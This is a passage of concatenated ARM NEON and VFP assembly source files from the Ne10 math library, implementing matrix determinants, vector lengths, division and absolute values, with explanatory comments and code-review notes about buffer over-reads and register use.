GET_DETERMINANT_of_4x4MATS_ARGS d0, d2, d4, d6, d16, d18, d20, d22, d1, d3, d5, d7, d17, d19, d21, d23, d24, d26, d28, d30, d25, d27
ble .L_mainloopend_mat4x4
.L_mainloop_mat4x4:
@ store the result (two determinants in d24) for the current set
vst1.32 {d24}, [r0]!
@ load the next set of values
LOAD_4x4MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d16, d17, d18, d19, d20, d21, d22, d23, q0, q1, q2, q3, q8, q9, q10, q11, r1
subs r2, r2, #2
@ calculate values for the next set
GET_DETERMINANT_of_4x4MATS_ARGS d0, d2, d4, d6, d16, d18, d20, d22, d1, d3, d5, d7, d17, d19, d21, d23, d24, d26, d28, d30, d25, d27
bgt .L_mainloop_mat4x4 @ loop if r2 > 0, if we have at least another 2 matrices to process
.L_mainloopend_mat4x4:
@ the last iteration for this call
@ store the result for the last set
vst1.32 {d24}, [r0]!
.L_check_mat4x4:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ process the last few items left in the input array, one matrix at a time
@ (single-lane vld4 loads place one matrix in lane 0 of each register)
vld4.32 { d0[0], d2[0], d4[0], d6[0]}, [r1]!
vld4.32 { d1[0], d3[0], d5[0], d7[0]}, [r1]!
vld4.32 { d16[0], d18[0], d20[0], d22[0]}, [r1]!
vld4.32 { d17[0], d19[0], d21[0], d23[0]}, [r1]!
subs r3, r3, #1
@ calculate values
GET_DETERMINANT_of_4x4MATS_ARGS d0, d2, d4, d6, d1, d3, d5, d7, d16, d18, d20, d22, d17, d19, d21, d23, d24, d26, d28, d30, d25, d27
@ store the results
vst1.32 {d24[0]}, [r0]!
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ return NE10_OK (0)
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 5,984 | modules/math/NE10_len.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_len.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_len_vec2f_asm
.thumb
.thumb_func
ne10_len_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec2f(arm_float_t * dst,
@ arm_vec2f_t * src, unsigned int count)
@
@ Computes dst[i] = sqrt(src[i].x^2 + src[i].y^2) for i in [0, count)
@ using scalar VFP code. Both pointers are first advanced past the end
@ of their arrays and the loop then walks backwards with pre-decrement
@ (vldmdb/vstmdb) loads and stores.
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec2F @ count == 0: nothing to do, return immediately
add r0, r0, r2, lsl #2 @ r0 = dst + count * 4, one past the last output float
add r1, r1, r2, lsl #3 @ r1 = r1 + count * 8, one past the last input vec2
.LoopBeginVec2F:
vldmdb r1!, {s10-s11} @ pre-decrement load: s10 = x, s11 = y
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 ), IEEE-exact VFP square root
vstmdb r0!, {s15} @ pre-decrement store: dst[i] = s15, moving backwards
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec2F @ loop while r2 != 0
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
.balign 4
.global ne10_len_vec3f_asm
.thumb
.thumb_func
ne10_len_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec3f(arm_float_t * dst,
@ arm_vec3f_t * src, unsigned int count)
@
@ Computes dst[i] = sqrt(x^2 + y^2 + z^2) of each 3-float vector using
@ scalar VFP code, walking both arrays backwards from their ends with
@ pre-decrement (vldmdb/vstmdb) loads and stores.
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec3F @ count == 0: nothing to do
add r0, r0, r2, lsl #2 @ r0 = dst + count * 4, one past the last output float
add r1, r1, r2, lsl #3 @ r1 += count * 8 ...
add r1, r1, r2, lsl #2 @ r1 = r1 + count * 12, one past the last input vec3
.LoopBeginVec3F:
vldmdb r1!, {s10-s12} @ pre-decrement load: s10 = x, s11 = y, s12 = z
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vmla.f32 s14, s12, s12 @ s14 = x*x + y*y + z*z
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 ), IEEE-exact VFP square root
vstmdb r0!, {s15} @ pre-decrement store: dst[i] = s15, moving backwards
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec3F @ loop while r2 != 0
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
.balign 4
.global ne10_len_vec4f_asm
.thumb
.thumb_func
ne10_len_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec4f(arm_float_t * dst,
@ arm_vec4f_t * src, unsigned int count)
@
@ Computes dst[i] = sqrt(x^2 + y^2 + z^2 + w^2) of each 4-float vector
@ using scalar VFP code, walking both arrays backwards from their ends
@ with pre-decrement (vldmdb/vstmdb) loads and stores.
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec4F @ count == 0: nothing to do
add r0, r0, r2, lsl #2 @ r0 = dst + count * 4, one past the last output float
add r1, r1, r2, lsl #4 @ r1 = r1 + count * 16, one past the last input vec4
.LoopBeginVec4F:
vldmdb r1!, {s10-s13} @ pre-decrement load: s10..s13 = x, y, z, w
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vmla.f32 s14, s12, s12 @ s14 = x*x + y*y + z*z
vmla.f32 s14, s13, s13 @ s14 = x*x + y*y + z*z + w*w
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 ), IEEE-exact VFP square root
vstmdb r0!, {s15} @ pre-decrement store: dst[i] = s15, moving backwards
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec4F @ loop while r2 != 0
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 14,550 | modules/math/NE10_div.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_div.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_div_float_neon
.thumb
.thumb_func
ne10_div_float_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_div_float(arm_float_t * dst,
@ arm_float_t * src1,
@ arm_float_t * src2,
@ unsigned int count)
@
@ Computes dst[i] = src1[i] / src2[i] for i in [0, count).
@ Division is implemented as multiplication by a VRECPE reciprocal
@ estimate refined with one VRECPS Newton-Raphson step, so results are
@ approximate rather than IEEE-exact quotients.
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4} @ r4 is callee-saved (AAPCS): preserve it
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_float
.L_residualloop_float:
@ process the residual (count % 4) items one float at a time
vld1.f32 d0[0], [r1]! @ Fill in d0[0]
vld1.f32 d1[0], [r2]! @ Fill in d1[0]
subs r4, r4, #1
@ d0 = d0 / d1 via reciprocal estimate + one Newton-Raphson step
vrecpe.f32 d3, d1 @ d3 ~= 1/d1 (estimate)
vrecps.f32 d1, d3, d1 @ d1 = 2 - d3*d1 (NR correction factor)
vmul.f32 d3, d1, d3 @ d3 = refined 1/d1
vmul.f32 d0, d0, d3 @ d0 = d0 * (1/d1)
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_float
.L_check_mainloop_float:
cbz r3, .L_return_float
@ load the current set of values (software-pipelined: load runs ahead
@ of the arithmetic of the previous iteration)
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
.L_mainloop_float:
@ q3 = q0 / q1 via reciprocal estimate + one Newton-Raphson step
vrecpe.f32 q3, q1
vrecps.f32 q1, q3, q1
vmul.f32 q3, q1, q3
vmul.f32 q3, q0, q3
@ store the result for the 1st/next (e.g. 3rd) set
vst1.32 {d6,d7}, [r0]!
subs r3, r3, #1
@ load the next (e.g. 3rd) set of values
@ NOTE(review): these loads also execute on the final iteration,
@ reading 16 bytes past the end of src1/src2 - confirm callers
@ tolerate this over-read
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
bgt .L_mainloop_float @ loop if r3 > 0, if we have at least another 4 floats
.L_return_float:
@ restore r4 and return NE10_OK (0)
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_vdiv_vec2f_neon
.thumb
.thumb_func
ne10_vdiv_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_div_float(arm_vec2f_t * dst,
@ arm_vec2f_t * src1,
@ arm_vec2f_t * src2,
@ unsigned int count)
@
@ Component-wise division of 2-float vectors: dst[i] = src1[i]/src2[i].
@ Uses VRECPE + one VRECPS Newton-Raphson step, so quotients are
@ approximate rather than IEEE-exact.
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4} @ r4 is callee-saved (AAPCS): preserve it
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec2
.L_residualloop_vec2:
@ process the residual (count % 4) items one vec2 at a time
vld1.f32 d0, [r1]! @ d0 = { V1.x, V1.y }
vld1.f32 d1, [r2]! @ d1 = { V2.x, V2.y }
subs r4, r4, #1
@ calculate values
@ d0 = d0 / d1 (reciprocal estimate + one Newton-Raphson step)
vrecpe.f32 d4, d1
vrecps.f32 d1, d4, d1
vmul.f32 d4, d1, d4
vmul.f32 d0, d0, d4
vst1.32 {d0}, [r0]!
bgt .L_residualloop_vec2
.L_check_mainloop_vec2:
cbz r3, .L_return_vec2
@ load the current set of values; vld2 de-interleaves:
@ q0/q2 hold the x components, q1/q3 hold the y components
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
.L_mainloop_vec2:
@ calculate values for current set
@ q8 = q0 / q2 (x components)
vrecpe.f32 q8, q2
vrecps.f32 q2, q8, q2
vmul.f32 q8, q2, q8
vmul.f32 q8, q0, q8
@ q9 = q1 / q3 (y components)
vrecpe.f32 q9, q3
vrecps.f32 q3, q9, q3
vmul.f32 q9, q3, q9
vmul.f32 q9, q1, q9
@ store the result for current set (vst2 re-interleaves x/y)
vst2.32 {d16,d17,d18,d19}, [r0]!
subs r3, r3, #1
@ load the next set of values
@ NOTE(review): these loads also execute on the final iteration,
@ reading 32 bytes past the end of src1/src2 - confirm callers
@ tolerate this over-read
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
bgt .L_mainloop_vec2 @ loop if r3 > 0, if we have at least another 4 vectors (8 floats) to process
.L_return_vec2:
@ restore r4 and return NE10_OK (0)
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_vdiv_vec3f_neon
.thumb
.thumb_func
ne10_vdiv_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_div_float(arm_vec3f_t * dst,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ Component-wise division of 3-float vectors: dst[i] = src1[i]/src2[i].
@ Uses VRECPE + one VRECPS Newton-Raphson step, so quotients are
@ approximate rather than IEEE-exact.
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4} @ r4 is callee-saved (AAPCS): preserve it
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec3
.L_residualloop_vec3:
@ process the residual (count % 4) items one vec3 at a time; numerator
@ goes into lane 0 of d0/d2/d4, denominator into lane 0 of d1/d3/d5
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
subs r4, r4, #1
@ per-component: refined-reciprocal multiply (d0 /= d1, d2 /= d3, d4 /= d5)
vrecpe.f32 d18, d1
vrecps.f32 d1 , d18, d1
vmul.f32 d18, d1 , d18
vmul.f32 d0 , d0 , d18
vrecpe.f32 d20, d3
vrecps.f32 d3 , d20, d3
vmul.f32 d20, d3 , d20
vmul.f32 d2 , d2 , d20
vrecpe.f32 d22, d5
vrecps.f32 d5 , d22, d5
vmul.f32 d4 , d4 , d22
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_residualloop_vec3
.L_check_mainloop_vec3:
cbz r3, .L_return_vec3
@ load current set of values; vld3 de-interleaves four vec3s:
@ q0 = all x, q1 = all y, q2 = all z (numerators), q9/q10/q11 likewise
@ for the denominators
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d18, d20, d22}, [r2]!
vld3.32 {d19, d21, d23}, [r2]!
.L_mainloop_vec3:
@ calculate values for current set
@ q12 = q0 / q9 (x components)
vrecpe.f32 q12, q9
vrecps.f32 q9 , q12, q9
vmul.f32 q12, q9 , q12
vmul.f32 q12, q0 , q12
@ q13 = q1 / q10 (y components)
vrecpe.f32 q13, q10
vrecps.f32 q10 , q13, q10
vmul.f32 q13, q10 , q13
vmul.f32 q13, q1 , q13
@ q14 = q2 / q11 (z components)
vrecpe.f32 q14, q11
vrecps.f32 q11 , q14, q11
vmul.f32 q14, q11 , q14
vmul.f32 q14, q2 , q14
@ store the result for current set (vst3 re-interleaves x/y/z)
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
subs r3, r3, #1
@ load next set of values
@ NOTE(review): these loads also execute on the final iteration,
@ reading 48 bytes past the end of src1/src2 - confirm callers
@ tolerate this over-read
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d18, d20, d22}, [r2]!
vld3.32 {d19, d21, d23}, [r2]!
bgt .L_mainloop_vec3 @ loop if r3 > 0, if we have at least another 4 vectors (12 floats) to process
.L_return_vec3:
@ restore r4 and return NE10_OK (0)
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_vdiv_vec4f_neon
.thumb
.thumb_func
ne10_vdiv_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_div_float(arm_vec4f_t * dst,
@ arm_vec4f_t * src1,
@ arm_vec4f_t * src2,
@ unsigned int count)
@
@ Component-wise division of 4-float vectors: dst[i] = src1[i]/src2[i].
@ Uses VRECPE + one VRECPS Newton-Raphson step, so quotients are
@ approximate rather than IEEE-exact.
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4} @ r4 is callee-saved (AAPCS): preserve it
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec4
.L_residualloop_vec4:
@ process the residual (count % 4) items one vec4 (one q register) at a time
vld1.f32 {d0, d1}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, V1.y, V1.z, V1.w };
vld1.f32 {d2, d3}, [r2]! @ The values are loaded like so:
@ q1 = { V2.x, V2.y, V2.z, V2.w };
subs r4, r4, #1
@ calculate values
@ q0 = q0 / q1 (reciprocal estimate + one Newton-Raphson step)
vrecpe.f32 q2, q1
vrecps.f32 q1 , q2, q1
vmul.f32 q2, q1 , q2
vmul.f32 q0 , q0 , q2
vst1.32 {d0, d1}, [r0]!
bgt .L_residualloop_vec4
.L_check_mainloop_vec4:
cbz r3, .L_return_vec4
@ load the current set of values; vld4 de-interleaves four vec4s:
@ q0..q3 = numerator x/y/z/w planes, q8..q11 = denominator planes
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
.L_mainloop_vec4:
@ calculate values for current set
@ q12 = q0 / q8 (x components)
vrecpe.f32 q12, q8
vrecps.f32 q8 , q12, q8
vmul.f32 q12, q8 , q12
vmul.f32 q12, q0 , q12
@ q13 = q1 / q9 (y components)
vrecpe.f32 q13, q9
vrecps.f32 q9 , q13, q9
vmul.f32 q13, q9 , q13
vmul.f32 q13, q1 , q13
@ q14 = q2 / q10 (z components)
vrecpe.f32 q14, q10
vrecps.f32 q10 , q14, q10
vmul.f32 q14, q10 , q14
vmul.f32 q14, q2 , q14
@ q15 = q3 / q11 (w components)
vrecpe.f32 q15, q11
vrecps.f32 q11 , q15, q11
vmul.f32 q15, q11 , q15
vmul.f32 q15, q3 , q15
@ store the result for current set (vst4 re-interleaves x/y/z/w)
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
subs r3, r3, #1
@ load the next set of values
@ NOTE(review): these loads also execute on the final iteration,
@ reading 64 bytes past the end of src1/src2 - confirm callers
@ tolerate this over-read
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
bgt .L_mainloop_vec4 @ loop if r3 > 0, if we have at least another 4 vectors (16 floats) to process
.L_return_vec4:
@ restore r4 and return NE10_OK (0)
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 1,607 | modules/math/NE10_addmat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_addmat.asm.s
@
|
open-vela/external_Ne10 | 11,069 | modules/math/NE10_abs.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_abs.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_abs_float_neon
.thumb
.thumb_func
ne10_abs_float_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_abs_float(arm_float_t * dst,
@ arm_float_t * src,
@ unsigned int count);
@
@ Computes dst[i] = |src[i]| for i in [0, count): residual (count % 4)
@ items first, one float at a time, then the rest in a software-
@ pipelined loop of 4 floats per iteration.
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are residual that will be processed at the begin of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4; calculate the residual loop
asr r2, r2, #2 @ r2 = count >> 2; calculate the main loop
cbz r3, .L_check_mainloop_float
.L_residualloop_float:
@ process the residual items in the input array
vld1.f32 d0[0], [r1]! @ Fill in d0 = { V.x, 0 };
subs r3, r3, #1
@ absolute values
vabs.f32 d0, d0
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_float
.L_check_mainloop_float:
cbz r2, .L_return_float
@ load the current set of values
vld1.32 {q0}, [r1]! @ for current set
.L_mainloop_float:
@ absolute values of the current set
vabs.f32 q3, q0 @ q3 = abs( q0 )
@ store the result for the current set
vst1.32 {d6,d7}, [r0]!
subs r2, r2, #1
@ load the next set
@ NOTE(review): this load also executes on the final iteration,
@ reading 16 bytes past the end of src - confirm callers tolerate it
vld1.32 {q0}, [r1]!
bgt .L_mainloop_float @ loop if r2 > 0, if we have another 4 floats
.L_return_float:
@ return NE10_OK (0)
mov r0, #0
bx lr
.align 4
.global ne10_abs_vec2f_neon
.thumb
.thumb_func
ne10_abs_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_abs_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src,
@ unsigned int count);
@
@ Computes the component-wise absolute value of count 2-float vectors.
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are residual that will be processed at the begin of
@ the input array
@
@ FIX: the main loop previously used q3/q4 as scratch. q4 aliases
@ d8/d9, which are callee-saved under the AAPCS VFP register rules, so
@ clobbering it without saving corrupted the caller's state. Scratch
@ now uses q8/q9 (d16-d19), which are caller-saved.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4; calculate the residual loop
asr r2, r2, #2 @ r2 = count >> 2; calculate the main loop
cbz r3, .L_check_mainloop_vec2
.L_residualloop_vec2:
@ process the residual items in the input array
vld1.f32 d0, [r1]! @ Fill in d0 = { V.x, V.y };
subs r3, r3, #1
@ absolute values
